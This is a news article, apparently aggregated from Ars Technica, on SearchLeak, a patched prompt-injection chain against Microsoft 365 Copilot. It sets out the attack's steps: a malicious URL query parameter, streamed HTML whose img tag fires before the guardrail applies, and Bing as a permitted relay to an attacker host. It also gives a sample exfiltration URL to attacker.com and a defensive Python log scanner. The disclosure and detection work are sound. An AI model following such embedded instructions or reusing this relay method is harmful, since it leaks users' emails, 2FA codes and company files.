
Microsoft Copilot flaw let attackers steal 2FA codes

Researchers disclosed a proof-of-concept SearchLeak chain that used Copilot to expose 2FA codes and other M365 data via image requests.

The Brieftide

TL;DR

  • Researchers disclosed a proof-of-concept SearchLeak chain that used Copilot to expose 2FA codes and other M365 data via image requests.
  • That sequence let an <img> tag fire an HTTP request carrying extracted data to an external endpoint before Copilot's post-generation guardrail applied.
  • The researchers showed the attacker sends a victim an email containing a URL such as https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q= with an instruction in the q field.

Microsoft patched a maximum severity vulnerability in its M365 Copilot platform last Tuesday, and on Monday the researchers who reported the bug published a proof-of-concept showing how it could retrieve two-factor authentication codes and other sensitive data from emails accessible to Copilot.

The exploit, which the researchers and security firm Varonis call SearchLeak, chains a Parameter-to-Prompt Injection with HTML rendering and a permitted Bing request to funnel secrets to an attacker-controlled server.

How did the SearchLeak exploit bypass Copilot's guardrails?

SearchLeak used a Parameter-to-Prompt Injection in a URL query to force Copilot to act on instructions hidden in a link, then relied on Copilot streaming raw HTML that the browser rendered before output was wrapped in a protective block. That sequence let an <img> tag fire an HTTP request carrying extracted data to an external endpoint before Copilot's post-generation guardrail applied.

The researchers showed the attacker sends a victim an email containing a URL such as https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q= with an instruction in the q field. Copilot begins streaming a response that includes an <img> tag. The browser renders the <img> and issues an HTTP request to the src URL. Only after Copilot finishes generating does the guardrail wrap output in a block, by which time the request has already left the browser.

Because Copilot restricts direct requests to untrusted sites, the exploit next used Bing as a trampoline. Per the Copilot content security policy, Bing is permitted to send such requests. The researchers showed the flow produces a request like https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png which causes Bing to forward the image URL to the attacker-controlled domain.
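As an added example (not code from the researchers, Varonis or Microsoft), the two URL shapes quoted above can be turned into a detection pass over mail-gateway or proxy logs. The query-length and markup heuristics, the trusted-host list and the sample URLs are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Hosts and paths below come from the two URLs quoted in the article.
COPILOT_HOST = "m365.cloud.microsoft"
BING_HOST, BING_RELAY_PATH = "www.bing.com", "/images/searchbyimage"
# Assumptions to tune locally: trusted image hosts and a "normal" query length.
TRUSTED_IMAGE_HOSTS = {"intranet.example.com"}
MAX_QUERY_CHARS = 120

def classify(url):
    """Return findings for one URL taken from mail-gateway or proxy logs."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # Stage 1: Copilot search link whose q value looks like more than a search term.
    if host == COPILOT_HOST and parts.path.rstrip("/") == "/search":
        q = " ".join(params.get("q", [])).lower()
        if len(q) > MAX_QUERY_CHARS or "<img" in q or "://" in q:
            findings.append("copilot-search-link-with-suspicious-q")
    # Stage 2: Bing image search asked to fetch an image from an untrusted host.
    if host == BING_HOST and parts.path == BING_RELAY_PATH:
        for img in params.get("imgurl", []):
            img_host = (urlsplit(img).hostname or "").lower()
            if img_host not in TRUSTED_IMAGE_HOSTS:
                findings.append("bing-image-relay-to:" + img_host)
    return findings

def scan(urls):
    """Map each flagged URL to its findings; clean URLs are omitted."""
    return {u: f for u in urls if (f := classify(u))}

# Constructed sample log entries (not captured traffic).
SAMPLE_URLS = [
    "https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=quarterly+budget",
    "https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=" + "x" * 200,
    "https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png",
    "https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://intranet.example.com/logo.png",
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE_URLS).items():
        print(findings, url[:80])
```

Correlating a stage 1 hit in mail with a stage 2 hit from the same user's browser shortly afterwards is a stronger signal than either finding alone.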

What specific techniques and components were involved?

The chain combined at least three elements: a Parameter-to-Prompt Injection, raw HTML streaming that briefly escapes Copilot's output-wrapping guardrail, and a permitted third-party relay in Bing to reach an attacker domain. The researchers described the Parameter-to-Prompt Injection as a close relative of prompt injection where the malicious command sits in a URL query parameter rather than in an email or other content. Varonis named the overall attack SearchLeak and warned the blast radius reaches enterprise content indexed by M365, including emails, meeting invites, notes, SharePoint documents and OneDrive files.

The researchers summed up the critical role of search in the exploit: “The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough,” they wrote.

Why does this weakness keep coming up?

The root cause is the fundamental inability of LLM-based assistants to reliably distinguish between user instructions and instructions embedded in third-party content they are asked to summarize or act on. Microsoft and other large language model providers have been unable to prevent their products from complying with malicious requests hidden inside content. In Copilot the vendor layered guardrails such as wrapping output in blocks and restricting outgoing requests to trusted domains, but the researchers found a timing and relay gap that let data leak before those protections applied.

Microsoft patched the specific vulnerabilities used by SearchLeak on Tuesday, but the researchers noted there is no known way to fix the underlying problem that allows models to be tricked by embedded instructions. The result is an arms race of ad hoc mitigations that attackers will attempt to bypass in new ways.

Why it matters

SearchLeak targets enterprise M365 accounts and not just personal mail. Varonis highlighted that the exploit can surface anything the user has access to inside the organization, expanding the blast radius to SharePoint, OneDrive and other indexed business content. The attack demonstrates how a single click by a user can trigger an automated assistant to perform actions that exfiltrate sensitive data without explicit user input beyond opening a URL.

What to watch

Watch for additional proof-of-concept variants that replace Bing or the image relay step with other permitted services, and for vendor changes to streaming and rendering behavior that aim to eliminate the window between HTML rendering and guardrail application. The researchers and Varonis are the named parties who disclosed and described SearchLeak; Microsoft issued a patch for the specific flaws on Tuesday.

SearchLeak exploit data flow

  • Attacker: crafts URL with malicious q parameter → sends email with malicious search URL
  • Victim Email: contains link to m365.cloud.microsoft/search/?...&q= → victim clicks link; Copilot processes query
  • M365 Copilot: streams raw HTML response → streams raw HTML including <img>
  • Victim Browser: renders <img> and issues HTTP request → browser issues image request to allowed Bing URL
  • Bing: permitted relay per content security policy → Bing forwards image URL to attacker domain
  • Attacker Server: receives forwarded request with stolen data


Written by The Brieftide · Source: Ars Technica
